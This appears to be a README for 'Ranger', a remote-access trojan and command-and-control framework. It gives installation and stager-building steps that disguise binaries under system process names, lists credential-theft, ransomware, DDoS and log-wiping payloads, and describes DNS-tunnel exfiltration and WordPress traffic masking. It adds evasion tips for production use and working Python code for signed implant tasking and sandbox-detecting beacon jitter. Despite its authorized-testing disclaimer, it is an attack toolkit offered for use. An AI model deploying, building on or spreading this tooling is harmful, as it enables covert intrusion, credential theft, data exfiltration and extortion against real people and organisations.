ranger-RAT

Ranger

A Malleable, Cross-Platform C2 Framework with WordPress Mimicry & DNS Exfiltration

Ranger is a command and control framework designed for red team operations, security research, and adversary simulation. It features a three-stage deployment model, advanced evasion techniques, and a modular payload architecture that works across Windows, Linux, macOS, Android, and iOS.

Key Features

Multi-Layer Evasion

  • Stage 1 (Stager): Compiled executable with environment keying, sandbox detection, and self-destruct
  • Stage 2 (Implant): Memory-only Python execution, B-Tier process masking (taskhostw.exe, metadatah, packagekitd)
  • Stage 3 (C2): WordPress-mimicking Nginx proxy with cookie-based data transfer

Cryptographic Trust

  • Ed25519-signed payloads with timestamp/nonce replay protection
  • Fernet-encrypted C2 channels with per-implant session keys
  • Hardware-anchored fingerprinting (MAC + disk serial)
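The signed-and-encrypted task envelope the three bullets above describe, as an added example written for this page rather than code taken from Ranger. It uses the cryptography package the install step already pulls in. The envelope layout ({"task", "ts", "nonce"} signed as canonical JSON), the 120-second skew window, the in-memory nonce cache and the demo() walkthrough are assumptions; Ranger's actual wire format is not shown on this page.

```python
import json
import os
import time

from cryptography.exceptions import InvalidSignature
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives.asymmetric.ed25519 import (
    Ed25519PrivateKey,
    Ed25519PublicKey,
)

MAX_SKEW = 120  # seconds; assumed acceptance window for the timestamp check


def sign_task(priv: Ed25519PrivateKey, task: dict, now=None) -> bytes:
    """Operator side: wrap a task in a timestamped, nonced envelope and sign it.

    The envelope layout is an assumption for this example, not Ranger's format.
    """
    ts = int(now if now is not None else time.time())
    env = {"task": task, "ts": ts, "nonce": os.urandom(16).hex()}
    body = json.dumps(env, sort_keys=True, separators=(",", ":")).encode()
    sig = priv.sign(body)
    return json.dumps({"body": body.decode(), "sig": sig.hex()}).encode()


class TaskVerifier:
    """Implant side: holds only the public key, so a captured implant cannot forge tasks."""

    def __init__(self, pub: Ed25519PublicKey, max_skew: int = MAX_SKEW):
        self.pub = pub
        self.max_skew = max_skew
        self.seen = {}  # nonce -> ts, kept only for the skew window

    def verify(self, signed: bytes, now=None) -> dict:
        now = now if now is not None else time.time()
        outer = json.loads(signed)
        body = outer["body"].encode()
        # 1. Signature first: nothing inside the body is trusted until this passes.
        self.pub.verify(bytes.fromhex(outer["sig"]), body)  # raises InvalidSignature
        env = json.loads(body)
        # 2. Freshness: reject anything outside +/- max_skew of the implant's clock.
        if abs(now - env["ts"]) > self.max_skew:
            raise ValueError("stale or future timestamp")
        # 3. Replay: a nonce is accepted once. Nonces whose timestamp would already
        #    fail check 2 are evicted, so the cache stays bounded.
        self.seen = {n: t for n, t in self.seen.items() if abs(now - t) <= self.max_skew}
        if env["nonce"] in self.seen:
            raise ValueError("replayed nonce")
        self.seen[env["nonce"]] = env["ts"]
        return env["task"]


def wrap_for_implant(session_key: bytes, signed: bytes) -> bytes:
    """C2 side: encrypt the signed envelope under this implant's Fernet session key."""
    return Fernet(session_key).encrypt(signed)


def unwrap_on_implant(session_key: bytes, token: bytes, verifier: TaskVerifier, now=None) -> dict:
    """Implant side: decrypt (Fernet is authenticated, so a damaged token fails here), then verify."""
    return verifier.verify(Fernet(session_key).decrypt(token), now)


def demo() -> dict:
    """Walk one envelope through accept, replay, stale and tamper cases at fixed clocks."""
    priv = Ed25519PrivateKey.generate()
    verifier = TaskVerifier(priv.public_key())
    session_key = Fernet.generate_key()  # per-implant key; exchanged out of band here
    t0 = 1_700_000_000
    results = {}

    token = wrap_for_implant(session_key, sign_task(priv, {"cmd": "whoami"}, now=t0))
    results["first"] = unwrap_on_implant(session_key, token, verifier, now=t0 + 5)
    try:  # the same token delivered again a few seconds later
        unwrap_on_implant(session_key, token, verifier, now=t0 + 10)
    except ValueError as e:
        results["replay"] = str(e)
    try:  # fresh nonce, but signed ten minutes before the implant sees it
        old = wrap_for_implant(session_key, sign_task(priv, {"cmd": "id"}, now=t0))
        unwrap_on_implant(session_key, old, verifier, now=t0 + 600)
    except ValueError as e:
        results["stale"] = str(e)
    try:  # attacker holding the session key edits the task but cannot re-sign it
        outer = json.loads(sign_task(priv, {"cmd": "whoami"}, now=t0))
        outer["body"] = outer["body"].replace("whoami", "id")
        verifier.verify(json.dumps(outer).encode(), now=t0)
    except InvalidSignature:
        results["tampered"] = "InvalidSignature"
    return results


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Order matters: the signature is checked before any field of the body is read, the timestamp bounds the nonce cache so it cannot grow without limit, and the implant holds only the public key, so recovering an implant yields nothing that can sign a task. Fernet authenticates the ciphertext, so a token altered in transit fails at decrypt() with InvalidToken before verify() runs; the tamper case in demo() therefore edits the inner envelope directly, modelling an attacker who already has the session key.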

Multi-Channel Communication

  • Primary Channel: HTTPS with cookie-embedded data (mimics web traffic)
  • Secondary Channel: DNS tunneling for stealthy exfiltration
  • Fallback: Legacy AES-EAX for backward compatibility

Modular Payload System

  • 30+ pre-built payloads in /payloads directory
  • Dynamic loading from C2 without recompilation
  • Support for custom modules via simple Python interface

Operator Dashboard

  • Real-time implant monitoring with jitter analysis
  • DNS exfil viewer with data reconstruction
  • Payload management and deployment console

Architecture Overview


┌─────────────┐     HTTPS      ┌─────────────┐     DNS      ┌─────────────┐
│   STAGER    │ ─────────────> │     C2      │ ───────────> │   CLIENT    │
│ (compiled)  │ <───────────── │   Server    │ <─────────── │   Implant   │
└─────────────┘    Payloads    └─────────────┘   Queries    └─────────────┘
                                    │
                                    ▼
                            ┌─────────────┐
                            │  WordPress  │
                            │  Nginx Mask │
                            └─────────────┘

Installation

# Ubuntu/Debian
sudo apt-get update
sudo apt-get install -y nginx python3-pip openssl

# Python packages
pip3 install flask cryptography pycryptodome dnspython --break-system-packages

Clone the repository

# Clone the repository
git clone https://github.com/ekomsSavior/ranger.git
cd ranger

Deploy Nginx mask and C2

sudo ./deploy.sh

Start the C2 server

python3 c2.py

Access dashboard

https://your-server:4444/phase1/dashboard

Usage Guide

1. Generate a Stager

# Windows stager
pyinstaller --onefile --noconsole --name svchost.exe stager.py

# Linux stager
pyinstaller --onefile --name packagekitd stager.py

# macOS stager
pyinstaller --onefile --name metadatah stager.py

2. Start the DNS tunnel

python3 dnstunnel.py

3. Control Implants via Dashboard

Access https://your-c2:4444/phase1/dashboard to:
- View active implants with process names and jitter scores
- Send commands (shell, recon, file operations)
- Enable DNS tunneling for exfiltration
- Monitor exfiltrated data

Payload Modules

The framework includes 30+ ready-to-use payloads:

Category          Payloads
Recon             sysrecon.py, linpeas_light.py, cloud_detector.py
Credential Theft  browserstealer.py, hashdump.py, aws_credential_stealer.py
Persistence       advanced_cron_persistence.py, process_inject.py
Evasion           logcleaner.py, dnstunnel.py, polyloader.py
Lateral Movement  sshspray.py, container_escape.py
Impact            fileransom.py, ddos.py, k8s_secret_stealer.py

Configuration

C2 Settings (c2.py)

C2_PORT = 4444
C2_HOST = '0.0.0.0'
DNS_DOMAIN = "updates.your-domain.com"
COOKIE_NAMES = ['_ga', '_gid', 'xsid', 'PHPSESSID', 'wordpress_']

Nginx Mask (nginx/wordpress-mask.conf)

  • Proxies only implant traffic to C2
  • Redirects scanners to WordPress.org
  • Includes realistic WordPress headers

Implant Behavior (implant.py)

  • B-Tier process targeting (taskhostw.exe, sihost.exe, CompatTelRunner.exe)
  • Jittered beacon intervals (60-180s with time-based shaping)
  • Environmental keying (uptime, RAM, sandbox artifacts)

Operator Dashboard Features

Implant Monitoring

  • Jitter Score: flags implants that check in with suspiciously regular timing, as sandboxes that accelerate or skip sleep calls do
  • Process Tracking: Monitors process name changes
  • DNS Status: Shows which implants use DNS tunneling
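The jitter mechanism appears twice on this page: the implant draws beacon intervals from 60-180 s with time-based shaping (Implant Behavior, above), and the dashboard scores check-in regularity to spot sandboxed implants (Jitter Score). The following is an added example of both halves, written for this page and not taken from Ranger; the shaping rule (shorter sleeps during 08:00-18:00 UTC), the coefficient-of-variation threshold of 0.05, and the constructed check-in sequences in demo() are assumptions.

```python
import random
import statistics
from datetime import datetime, timedelta, timezone

BEACON_MIN, BEACON_MAX = 60, 180  # seconds, the interval range the page configures


def next_beacon_delay(now_utc: datetime, rng: random.Random) -> int:
    """Implant side: draw the next sleep from [60, 180] s.

    The shaping rule (shorter sleeps during 08:00-18:00 UTC, longer outside it) is an
    assumption standing in for the page's "time-based shaping".
    """
    mid = (BEACON_MIN + BEACON_MAX) // 2
    if 8 <= now_utc.hour < 18:
        lo, hi = BEACON_MIN, mid
    else:
        lo, hi = mid, BEACON_MAX
    return rng.randint(lo, hi)


def simulate_check_ins(start: datetime, count: int, seed: int) -> list:
    """Constructed check-in timestamps (epoch seconds) produced by the generator above."""
    rng = random.Random(seed)
    t = start
    stamps = [t.timestamp()]
    for _ in range(count - 1):
        t += timedelta(seconds=next_beacon_delay(t, rng))
        stamps.append(t.timestamp())
    return stamps


def jitter_score(check_ins: list, min_cv: float = 0.05) -> dict:
    """Dashboard side: score one implant's check-in history.

    cv is the coefficient of variation of the gaps between beacons. A real implant
    drawing from [60, 180] lands around 0.2; a sandbox that fast-forwards or ignores
    sleep produces gaps that are either identical (cv ~ 0) or outside the band.
    """
    if len(check_ins) < 3:
        return {"cv": None, "out_of_band": 0, "verdict": "insufficient data"}
    gaps = [b - a for a, b in zip(check_ins, check_ins[1:])]
    mean = statistics.fmean(gaps)
    cv = statistics.pstdev(gaps) / mean if mean > 0 else 0.0
    out_of_band = sum(1 for g in gaps if not BEACON_MIN <= g <= BEACON_MAX)
    suspect = cv < min_cv or out_of_band > len(gaps) // 2
    return {"cv": round(cv, 3), "out_of_band": out_of_band,
            "verdict": "suspect" if suspect else "ok"}


def demo() -> dict:
    """Score a jittered implant against two constructed sandbox-like histories."""
    start = datetime(2024, 1, 15, 9, 0, tzinfo=timezone.utc)
    real = simulate_check_ins(start, 30, seed=7)
    sandbox_fixed = [float(i * 120) for i in range(10)]  # constructed: jitter ignored
    sandbox_fast = [float(i) for i in range(10)]          # constructed: sleep skipped
    return {"real": jitter_score(real),
            "fixed": jitter_score(sandbox_fixed),
            "fast": jitter_score(sandbox_fast)}


if __name__ == "__main__":
    for name, score in demo().items():
        print(f"{name:6s} {score}")
```

The two failure modes need different checks: a sandbox that patches sleep to return immediately produces gaps far below 60 s (caught by out_of_band), while an emulator that honours the sleep but replays a fixed schedule produces gaps inside the band with no variance (caught by the cv threshold). Fewer than three check-ins yield one gap at most, which is not enough to say anything.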

Command Interface

  • Shell: Execute system commands
  • Recon: Gather system information
  • Download/Upload: File transfer
  • DNS Toggle: Enable/disable DNS exfiltration

Exfil Viewer

  • Reconstructed data from DNS fragments
  • Channel identification (HTTPS vs DNS)
  • Timestamp and size metadata

OpSec Recommendations

Production Deployment

  1. Use valid TLS certificates (Let's Encrypt)
  2. Front with CDN (Cloudflare, AWS CloudFront)
  3. Rotate domains regularly
  4. Monitor jitter scores for sandbox detection
  5. Encrypt database at rest

Evasion Tips

  • Vary cookie names (already implemented)
  • Add realistic delays between DNS queries
  • Mix in legitimate traffic to your C2 domain
  • Use multiple fallback domains for DNS tunnel

Legal Disclaimer

This software is intended for authorized security testing and educational purposes only. Users are responsible for complying with all applicable laws and regulations. The authors assume no liability for misuse or damage caused by this program.

License

MIT License

Copyright (c) 2026 ek0mssavi0r / Church of Malware

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.